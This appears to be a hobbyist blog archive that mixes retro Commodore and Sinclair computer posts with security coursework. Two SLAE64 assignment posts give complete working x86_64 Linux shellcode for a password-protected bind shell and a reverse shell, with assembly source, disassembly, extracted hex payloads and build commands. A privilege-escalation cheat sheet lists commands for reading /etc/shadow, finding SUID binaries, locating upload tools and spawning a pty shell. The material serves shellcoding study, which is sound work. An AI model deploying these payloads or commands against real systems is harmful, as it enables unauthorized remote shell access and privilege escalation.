So being a massive dork that I am, I couldn't turn down this Commodore Amiga lot that I came across.
Both an Amiga 1000 and a 2000HD! I'm excited about the 2000HD the most. I've wanted one for quite a while. The hard drive works great too. The lot also came with a TON of software. Mostly games and some video software. It came with several versions of Workbench and Kick Start. There is a lot of documentation too, which is handy when you can't find an answer online.
One of the first things I need to do is remove the battery that's next to the CPU on the main board, if it hasn't already been taken off. The batteries that were installed on these are dubbed "Board Killers", since they leak and cause all sorts of corrosion and ruin the components surrounding it.
Both machines work great as-is and I'll be doing some cleaning and preventative maintenance pretty soon, so I will probably post pictures if I find anything interesting.
Monday, May 15, 2017
Monday, May 8, 2017
My Commodore 64 Setup
Here is my Commodore 64 setup, with guest appearance from my Timex Sinclair 1000! I just recently bought the 1701 monitor from a guy in San Jose. Got it for a pretty decent price, considering it came with the box. For some reason I don't have a video cable for hooking up to the chroma input. Somehow I managed to only have composite/AV cables? The two 1541s both work great as well.
I plan on programming a C64 game eventually. It will probably be a Blade Runner-esque adventure game. I picked up a big stack of C64 programming books at a place called Urban Ore in Berkeley CA (I suggest making a trip there if you're in the area) recently, and I have been wanting to start a project.
Sunday, May 7, 2017
Linux x86_64 Bind Shell w/ password
Here is the second assignment for the x86_64 Assembly and Shellcoding Expert (SLAE64) certification. The goal of the assignment was to write a bind shell that requires a password to use. This one was a bit more difficult than the reverse shell in my opinion. The shell itself wasn't too bad, but the whole password thing took me a bit to get right. The shell kept hanging after it executed and wouldn't respond to input. Not exactly sure what was wrong, but it worked after starting from scratch a second time. I'm sure the issue was somewhere in the read() syscall.
Compile it with nasm
Looking for nulls in objdump
bindshell.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 c0 xor rax,rax
3: b0 29 mov al,0x29
5: 48 31 ff xor rdi,rdi
8: 40 b7 02 mov dil,0x2
b: 48 31 f6 xor rsi,rsi
e: 40 b6 01 mov sil,0x1
11: 48 31 d2 xor rdx,rdx
14: 0f 05 syscall
16: 48 89 c7 mov rdi,rax
19: 48 31 c0 xor rax,rax
1c: 50 push rax
1d: 89 44 24 fc mov DWORD PTR [rsp-0x4],eax
21: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
28: c6 44 24 f8 02 mov BYTE PTR [rsp-0x8],0x2
2d: 48 83 ec 08 sub rsp,0x8
31: 48 31 c0 xor rax,rax
34: b0 31 mov al,0x31
36: 48 89 e6 mov rsi,rsp
39: 48 31 d2 xor rdx,rdx
3c: b0 10 mov al,0x10
3e: 0f 05 syscall
40: 48 31 c0 xor rax,rax
43: b0 32 mov al,0x32
45: 48 31 f6 xor rsi,rsi
48: 40 b6 02 mov sil,0x2
4b: 0f 05 syscall
4d: 48 31 c0 xor rax,rax
50: b0 2b mov al,0x2b
52: 48 83 ec 10 sub rsp,0x10
56: 48 89 e6 mov rsi,rsp
59: 6a 10 push 0x10
5b: 48 89 e2 mov rdx,rsp
5e: 0f 05 syscall
60: 49 89 c1 mov r9,rax
63: 48 31 c0 xor rax,rax
66: b0 03 mov al,0x3
68: 0f 05 syscall
6a: 49 87 f9 xchg r9,rdi
6d: 48 31 f6 xor rsi,rsi
0000000000000070 <dup2>:
70: 6a 21 push 0x21
72: 58 pop rax
73: 0f 05 syscall
75: 48 ff c6 inc rsi
78: 48 83 fe 02 cmp rsi,0x2
7c: e0 f2 loopne 70 <dup2>
000000000000007e <Checkpass>:
7e: 48 31 c0 xor rax,rax
81: 6a 10 push 0x10
83: 5a pop rdx
84: 48 83 ec 10 sub rsp,0x10
88: 48 89 e6 mov rsi,rsp
8b: 31 ff xor edi,edi
8d: 0f 05 syscall
8f: 48 b8 50 61 73 73 77 movabs rax,0x64726f7773736150
96: 6f 72 64
99: 48 8d 3e lea rdi,[rsi]
9c: 48 af scas rax,QWORD PTR es:[rdi]
9e: 74 05 je a5 <Shell>
a0: 6a 3c push 0x3c
a2: 58 pop rax
a3: 0f 05 syscall
00000000000000a5 <Shell>:
a5: 48 31 c0 xor rax,rax
a8: 50 push rax
a9: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
b0: 2f 73 68
b3: 53 push rbx
b4: 48 89 e7 mov rdi,rsp
b7: 50 push rax
b8: 48 89 e2 mov rdx,rsp
bb: 57 push rdi
bc: 48 89 e6 mov rsi,rsp
bf: 48 83 c0 3b add rax,0x3b
c3: 0f 05 syscall
00000000000000c5 <Exit>:
c5: 6a 3c push 0x3c
c7: 58 pop rax
c8: 48 31 ff xor rdi,rdi
cb: 0f 05 syscall
No nulls! Time to pull the hex out of the objdump output.
\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\xb0\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xc0\x6a\x10\x5a\x48\x83\xec\x10\x48\x89\xe6\x31\xff\x0f\x05\x48\xb8\x50\x61\x73\x73\x77\x6f\x72\x64\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
global _start section .text _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 41 xor rax, rax mov al, 41 xor rdi, rdi mov dil, 2 xor rsi, rsi mov sil, 1 xor rdx, rdx syscall ; copy socket descriptor to rdi for future use mov rdi, rax ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = INADDR_ANY ; bzero(&server.sin_zero, 8) xor rax, rax push rax mov dword [rsp-4], eax mov word [rsp-6], 0x5c11 ; port 4444 mov byte [rsp-8], 0x2 sub rsp, 8 ; bind(sock, (struct sockaddr *)&server, sockaddr_len) ; syscall number 49 xor rax, rax mov al, 49 mov rsi, rsp xor rdx, rdx mov al, 16 syscall ; listen(sock, MAX_CLIENTS) ; syscall number 50 xor rax, rax mov al, 50 xor rsi, rsi mov sil, 2 syscall ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) ; syscall number 43 xor rax, rax mov al, 43 sub rsp, 16 mov rsi, rsp push 16 mov rdx, rsp syscall mov r9, rax ; store the client socket description xor rax, rax ; close parent mov al, 3 syscall xchg rdi , r9 xor rsi , rsi ; duplicate sockets
dup2: push 0x21 pop rax syscall inc rsi cmp rsi , 0x2 loopne dup2 Checkpass: xor rax , rax push 0x10 pop rdx sub rsp , 16 ; 16 bytes to receive user input mov rsi , rsp xor edi , edi syscall ; read() mov rax , 0x64726f7773736150 ; "Password" lea rdi , [rel rsi] scasq jz Shell push 0x3c pop rax syscall Shell: xor rax, rax ; First NULL push push rax mov rbx, 0x68732f2f6e69622f ; push /bin//sh in reverse push rbx mov rdi, rsp ; store /bin//sh address in RDI push rax ; Second NULL push mov rdx, rsp ; set RDX push rdi ; Push address of /bin//sh mov rsi, rsp ; set RSI ; Call the Execve syscall add rax, 59 syscall
Compile it with nasm
nasm -f elf64 MyBindShell.nasm -o bindshell.o
Looking for nulls in objdump
objdump -d bindshell.o -M intel
bindshell.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 c0 xor rax,rax
3: b0 29 mov al,0x29
5: 48 31 ff xor rdi,rdi
8: 40 b7 02 mov dil,0x2
b: 48 31 f6 xor rsi,rsi
e: 40 b6 01 mov sil,0x1
11: 48 31 d2 xor rdx,rdx
14: 0f 05 syscall
16: 48 89 c7 mov rdi,rax
19: 48 31 c0 xor rax,rax
1c: 50 push rax
1d: 89 44 24 fc mov DWORD PTR [rsp-0x4],eax
21: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
28: c6 44 24 f8 02 mov BYTE PTR [rsp-0x8],0x2
2d: 48 83 ec 08 sub rsp,0x8
31: 48 31 c0 xor rax,rax
34: b0 31 mov al,0x31
36: 48 89 e6 mov rsi,rsp
39: 48 31 d2 xor rdx,rdx
3c: b0 10 mov al,0x10
3e: 0f 05 syscall
40: 48 31 c0 xor rax,rax
43: b0 32 mov al,0x32
45: 48 31 f6 xor rsi,rsi
48: 40 b6 02 mov sil,0x2
4b: 0f 05 syscall
4d: 48 31 c0 xor rax,rax
50: b0 2b mov al,0x2b
52: 48 83 ec 10 sub rsp,0x10
56: 48 89 e6 mov rsi,rsp
59: 6a 10 push 0x10
5b: 48 89 e2 mov rdx,rsp
5e: 0f 05 syscall
60: 49 89 c1 mov r9,rax
63: 48 31 c0 xor rax,rax
66: b0 03 mov al,0x3
68: 0f 05 syscall
6a: 49 87 f9 xchg r9,rdi
6d: 48 31 f6 xor rsi,rsi
0000000000000070 <dup2>:
70: 6a 21 push 0x21
72: 58 pop rax
73: 0f 05 syscall
75: 48 ff c6 inc rsi
78: 48 83 fe 02 cmp rsi,0x2
7c: e0 f2 loopne 70 <dup2>
000000000000007e <Checkpass>:
7e: 48 31 c0 xor rax,rax
81: 6a 10 push 0x10
83: 5a pop rdx
84: 48 83 ec 10 sub rsp,0x10
88: 48 89 e6 mov rsi,rsp
8b: 31 ff xor edi,edi
8d: 0f 05 syscall
8f: 48 b8 50 61 73 73 77 movabs rax,0x64726f7773736150
96: 6f 72 64
99: 48 8d 3e lea rdi,[rsi]
9c: 48 af scas rax,QWORD PTR es:[rdi]
9e: 74 05 je a5 <Shell>
a0: 6a 3c push 0x3c
a2: 58 pop rax
a3: 0f 05 syscall
00000000000000a5 <Shell>:
a5: 48 31 c0 xor rax,rax
a8: 50 push rax
a9: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
b0: 2f 73 68
b3: 53 push rbx
b4: 48 89 e7 mov rdi,rsp
b7: 50 push rax
b8: 48 89 e2 mov rdx,rsp
bb: 57 push rdi
bc: 48 89 e6 mov rsi,rsp
bf: 48 83 c0 3b add rax,0x3b
c3: 0f 05 syscall
00000000000000c5 <Exit>:
c5: 6a 3c push 0x3c
c7: 58 pop rax
c8: 48 31 ff xor rdi,rdi
cb: 0f 05 syscall
No nulls! Time to pull the hex out of the objdump output.
for i in $(objdump -d bindshell.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\xb0\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xc0\x6a\x10\x5a\x48\x83\xec\x10\x48\x89\xe6\x31\xff\x0f\x05\x48\xb8\x50\x61\x73\x73\x77\x6f\x72\x64\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
Saturday, May 6, 2017
Linux x86_64 Reverse Shell w/ password
So this is my first assignment for the x86_64 Assembly and Shellcoding Expert (SLAE64) certification requirements. The assignment was to create shellcode that will spawn a reverse TCP shell that requires a password.
So now that I have the my shell written, I need to compile it.
Now to run objdump to see if there are any nulls.
The output shows there are no nulls, save the nulls inherent in the IP address 127.0.0.1 that I used for testing purposes. (highlighted in yellow)
RevShellpass.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 c0 xor rax,rax
3: b0 29 mov al,0x29
5: 48 31 ff xor rdi,rdi
8: 40 b7 02 mov dil,0x2
b: 48 31 f6 xor rsi,rsi
e: 40 b6 01 mov sil,0x1
11: 48 31 d2 xor rdx,rdx
14: 0f 05 syscall
16: 48 89 c7 mov rdi,rax
19: 48 31 c0 xor rax,rax
1c: 50 push rax
1d: c7 44 24 fc 7f 00 00 mov DWORD PTR [rsp-0x4],0x100007f
24: 01
25: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
2c: c6 44 24 f8 02 mov BYTE PTR [rsp-0x8],0x2
31: 48 83 ec 08 sub rsp,0x8
35: 48 31 c0 xor rax,rax
38: b0 2a mov al,0x2a
3a: 48 89 e6 mov rsi,rsp
3d: 48 31 d2 xor rdx,rdx
40: b2 10 mov dl,0x10
42: 0f 05 syscall
44: 48 31 c0 xor rax,rax
47: b0 21 mov al,0x21
49: 48 31 f6 xor rsi,rsi
4c: 0f 05 syscall
4e: 48 31 c0 xor rax,rax
51: b0 21 mov al,0x21
53: 48 31 f6 xor rsi,rsi
56: 40 b6 01 mov sil,0x1
59: 0f 05 syscall
5b: 48 31 c0 xor rax,rax
5e: b0 21 mov al,0x21
60: 48 31 f6 xor rsi,rsi
63: 40 b6 02 mov sil,0x2
66: 0f 05 syscall
0000000000000068 <password_check>:
68: 54 push rsp
69: 5e pop rsi
6a: 48 31 c0 xor rax,rax
6d: 0f 05 syscall
6f: 68 70 61 73 73 push 0x73736170
74: 58 pop rax
75: 48 8d 3e lea rdi,[rsi]
78: af scas eax,DWORD PTR es:[rdi]
79: 75 20 jne 9b <Exit>
7b: 48 31 c0 xor rax,rax
7e: 50 push rax
7f: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
86: 2f 73 68
89: 53 push rbx
8a: 48 89 e7 mov rdi,rsp
8d: 50 push rax
8e: 48 89 e2 mov rdx,rsp
91: 57 push rdi
92: 48 89 e6 mov rsi,rsp
95: 48 83 c0 3b add rax,0x3b
99: 0f 05 syscall
000000000000009b <Exit>:
9b: 6a 3c push 0x3c
9d: 58 pop rax
9e: 48 31 ff xor rdi,rdi
a1: 0f 05 syscall
Now that there are no nulls in the shellcode, time to pull the hex out of the objdump output.
\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\x7f\x00\x00\x01\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x2a\x48\x89\xe6\x48\x31\xd2\xb2\x10\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x40\xb6\x01\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x40\xb6\x02\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68\x70\x61\x73\x73\x58\x48\x8d\x3e\xaf\x75\x20\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
Linking it with ld to test it as a standalone binary
global _start _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 41 xor rax, rax mov al, 41 xor rdi, rdi mov dil, 2 xor rsi, rsi mov sil, 1 xor rdx, rdx syscall ; copy socket descriptor to rdi for future use mov rdi, rax ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = inet_addr("127.0.0.1") ; bzero(&server.sin_zero, 8) xor rax, rax push rax mov dword [rsp-4], 0x0100007f ; IP address 127.0.0.1 mov word [rsp-6], 0x5c11 ; port 4444 mov byte [rsp-8], 0x2 sub rsp, 8 ; connect(sock, (struct sockaddr *)&server, sockaddr_len) xor rax, rax mov al, 42 mov rsi, rsp xor rdx, rdx mov dl, 16 syscall ; duplicate sockets ; dup2 (new, old) xor rax, rax mov al, 33 xor rsi, rsi syscall xor rax, rax mov al, 33 xor rsi, rsi mov sil, 1 syscall xor rax, rax mov al, 33 xor rsi, rsi mov sil, 2 syscall password_check: push rsp pop rsi xor rax, rax ; system read syscall value is 0 so rax is set to 0 syscall push 0x73736170 ;password 'pass' pop rax lea rdi, [rel rsi] scasd ; comparing the user input and stored password in the stack jne Exit ; execve ; First NULL push xor rax, rax push rax mov rbx, 0x68732f2f6e69622f ; push /bin//sh in reverse push rbx mov rdi, rsp ; store /bin//sh address in RDI push rax ; Second NULL push mov rdx, rsp ; set RDX push rdi ; Push address of /bin//sh mov rsi, rsp ; set RSI ; Call the Execve syscall add rax, 59 syscall Exit: ;Exit shellcode if password is wrong push 0x3c pop rax ;syscall number for exit is 60 xor rdi, rdi syscall
So now that I have the my shell written, I need to compile it.
nasm -f elf64 RevShellpass.nasm -o Revshellpass.o
Now to run objdump to see if there are any nulls.
objdump -d RevShellpass.o -M intel
The output shows there are no nulls, save the nulls inherent in the IP address 127.0.0.1 that I used for testing purposes. (highlighted in yellow)
RevShellpass.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 c0 xor rax,rax
3: b0 29 mov al,0x29
5: 48 31 ff xor rdi,rdi
8: 40 b7 02 mov dil,0x2
b: 48 31 f6 xor rsi,rsi
e: 40 b6 01 mov sil,0x1
11: 48 31 d2 xor rdx,rdx
14: 0f 05 syscall
16: 48 89 c7 mov rdi,rax
19: 48 31 c0 xor rax,rax
1c: 50 push rax
1d: c7 44 24 fc 7f 00 00 mov DWORD PTR [rsp-0x4],0x100007f
24: 01
25: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
2c: c6 44 24 f8 02 mov BYTE PTR [rsp-0x8],0x2
31: 48 83 ec 08 sub rsp,0x8
35: 48 31 c0 xor rax,rax
38: b0 2a mov al,0x2a
3a: 48 89 e6 mov rsi,rsp
3d: 48 31 d2 xor rdx,rdx
40: b2 10 mov dl,0x10
42: 0f 05 syscall
44: 48 31 c0 xor rax,rax
47: b0 21 mov al,0x21
49: 48 31 f6 xor rsi,rsi
4c: 0f 05 syscall
4e: 48 31 c0 xor rax,rax
51: b0 21 mov al,0x21
53: 48 31 f6 xor rsi,rsi
56: 40 b6 01 mov sil,0x1
59: 0f 05 syscall
5b: 48 31 c0 xor rax,rax
5e: b0 21 mov al,0x21
60: 48 31 f6 xor rsi,rsi
63: 40 b6 02 mov sil,0x2
66: 0f 05 syscall
0000000000000068 <password_check>:
68: 54 push rsp
69: 5e pop rsi
6a: 48 31 c0 xor rax,rax
6d: 0f 05 syscall
6f: 68 70 61 73 73 push 0x73736170
74: 58 pop rax
75: 48 8d 3e lea rdi,[rsi]
78: af scas eax,DWORD PTR es:[rdi]
79: 75 20 jne 9b <Exit>
7b: 48 31 c0 xor rax,rax
7e: 50 push rax
7f: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
86: 2f 73 68
89: 53 push rbx
8a: 48 89 e7 mov rdi,rsp
8d: 50 push rax
8e: 48 89 e2 mov rdx,rsp
91: 57 push rdi
92: 48 89 e6 mov rsi,rsp
95: 48 83 c0 3b add rax,0x3b
99: 0f 05 syscall
000000000000009b <Exit>:
9b: 6a 3c push 0x3c
9d: 58 pop rax
9e: 48 31 ff xor rdi,rdi
a1: 0f 05 syscall
Now that there are no nulls in the shellcode, time to pull the hex out of the objdump output.
for i in $(objdump -d RevShellpass.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\x7f\x00\x00\x01\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x2a\x48\x89\xe6\x48\x31\xd2\xb2\x10\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x40\xb6\x01\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x40\xb6\x02\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68\x70\x61\x73\x73\x58\x48\x8d\x3e\xaf\x75\x20\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
Linking it with ld to test it as a standalone binary
ld RevShellpass.o -o RevShellpass
Wednesday, May 3, 2017
Thrift Store Score: 1982 Timex Sinclair 1000
Found this at a local thrift store yesterday. A Timex Sinclair 1000 accompanied by the 1016 RAM (16k) module. This was the American release of the Sinclair ZX81. Its selling point was being the first home computer to sell for under $100.
I don't know if it this one works or not because it didn't come with a power supply. I suppose I will look around for one. I should be able to hook this up to one of my older TVs if I get it up and running. Apparently you have to mod them if you you want to use one on a modern TV. I would rather keep it original though.
As for the internals, everything seems to be okay from a superficial standpoint. No bad caps or any burned smell. I'm going to check it out a bit more in depth when I get a chance. The RAM module seems okay too. I suppose I'll find out what works and what doesn't whenever I find a power supply.
Monday, May 1, 2017
Taking Securitytube's Linux x86/64 Assembly and Shellcoding Course
So I started the SLAE64 course a few weeks back. So far I'm enjoying it. Vivek explains everything fairly well. The price wasn't that bad either. It only costs $149 (USD)
http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
I have some experience with x86 assembly, so I was able to pick up most of it right off the bat. It covers the basics of x86_64 assembly in Linux, which I might add that there are not a ton of resources out there for 64-bit assembly for whatever reason. Realistically, the resources are not impossible to find, just more sparse than 32-bit. The differences between the two are not that great, but having a little clarification on the addition of the R(n) registers and address sizes is nice to have.
Anyways, about the course content. There are a good amount of videos that go over the basic x86 assembly instructions like mov, pop, lea etc. The later videos in the 2nd half cover topics that pertain to shellcoding specifically, like removing nulls and implementing crypters. Even though some of the basics are covered, I would recommend at least having basic x86 assembly knowledge. There are some gaps that will need further explanation if you don't have prior knowledge.
The test is a series of seven assignments that you must complete and post on a public blog. I haven't completed them yet and will be posting them here at some point.
All in all I am enjoying the course, I mean its only $149 and you get a certificate when you complete it. If you are looking to get into shellcoding I would give this course some consideration.
http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
I have some experience with x86 assembly, so I was able to pick up most of it right off the bat. It covers the basics of x86_64 assembly in Linux, which I might add that there are not a ton of resources out there for 64-bit assembly for whatever reason. Realistically, the resources are not impossible to find, just more sparse than 32-bit. The differences between the two are not that great, but having a little clarification on the addition of the R(n) registers and address sizes is nice to have.
Anyways, about the course content. There are a good amount of videos that go over the basic x86 assembly instructions like mov, pop, lea etc. The later videos in the 2nd half cover topics that pertain to shellcoding specifically, like removing nulls and implementing crypters. Even though some of the basics are covered, I would recommend at least having basic x86 assembly knowledge. There are some gaps that will need further explanation if you don't have prior knowledge.
The test is a series of seven assignments that you must complete and post on a public blog. I haven't completed them yet and will be posting them here at some point.
All in all I am enjoying the course, I mean its only $149 and you get a certificate when you complete it. If you are looking to get into shellcoding I would give this course some consideration.
Enumerating for Privilege Escalation: Linux
So, you have a shell on a Linux machine. But what now? Privilege Escalation! (Unless you spawned a root shell of course! Then its time for some lateral movement I suppose). But before you can escalate your privileges, you will have to figure out how you are going to do it. So that brings us to enumeration, which is hands down the most important part of compromising a target.
or, for a faster search in "bin" directories
ex: find / -name python*
So this post is not intended to be a definitive guide to Linux priv-esc or anything, but merely a simple collection of things that I have personally found helpful during enumeration. I am totally open to suggestions or any ideas. This post is also heavily inspired by g0tmi1k's amazing post, Basic Linux Privilege Escalation:
or
I recommend bookmarking that ^
Get Your Bearings
First things first. Always get a good feel for the machine. Its always a good idea to figure out what version you're looking at:
cat /etc/issue
or
cat /etc/*-release
What is the kernel version? Are there known exploits for that version?
cat /proc/version uname -a rpm -q kernel
Where are you on the network? What connections are established?
ifconfig -a netstat -antup iptables -L arp -e
What is running?
There are numerous local privilege escalation exploits out there in the void. Are there any vulnerable applications or services running that have known exploits?
Which services are being run with root privileges?
ps -ef | grep root
ps aux | grep root
cat /etc/services
Any vulnerable applications?
ls -alh /usr/bin/ ls -alh /sbin/
Any files with SUID/SGID permissions?
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
Uploading and running exploit code
If there is a local privilege escalation exploit available, how will you upload and execute the exploit code on your target?
What languages are supported on the machine?
find / -name <language>*
Is GCC present?
find / -name gcc
How can you upload the exploit code? Use find to look for things like:
wget, nc, netcat, tftp, ftp, fetch etc.
Where can you write and execute files?
You will need to find a place to compile and execute your exploit code
This will locate world writeable and world executable folders
find / \(-perm -o w -perm -o x\) -type d 2>/dev/null
Cracking passwords
Can you view /etc/passwd and /etc/shadow ?
cat /etc/passwd cat /etc/shadow
If you can, try to crack the hashes you find. You never know!
Limited Shell?
Give these a shot.
python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash')
The simplest things are often overlooked
If I am ever stuck getting root privileges, its 9 times out of 10 because I am overthinking it. Sometimes the answer is so simple that its easy to overlook it. If you're getting stuck, think back to square one and move forward slowly and pay attention to the details. Here are some of simple things that can be overlooked:
Is the account you are using a sudoer? If you have the password for the account, you may be able to use sudo. I have seen many people look over this. Are there other users that are sudoers?
cat /etc/sudoers sudo -l
Always check for password reuse. Unless of course you don't want to be noisy and risk a failed authentication.
Sometimes people don't think straight and put plain text passwords in .txt files and spreadsheets and all kinds of terribly insecure places, so don't disregard the idea.
Enumeration scripts
To make life easier, you can write your own bash script to run whatever commands you want, although sometimes it is not plausible to do so. For example if you do not have the privilege to upload files or execute shell scripts.
Anyways, those are my usual go-to commands when I start enumerating for priv-esc. It is not an exhaustive list by any means, there is a whole world of possibilities out there for getting root and hopefully this will help! I'm sure I will add things as I think of them, seeing as I wrote this on my lunch at work and probably forgot a bunch of stuff. Happy Hunting.
Thank you to g0tmi1k for your awesome post on the subject. I have used it more than any other blog I can think of!
Subscribe to:
Posts (Atom)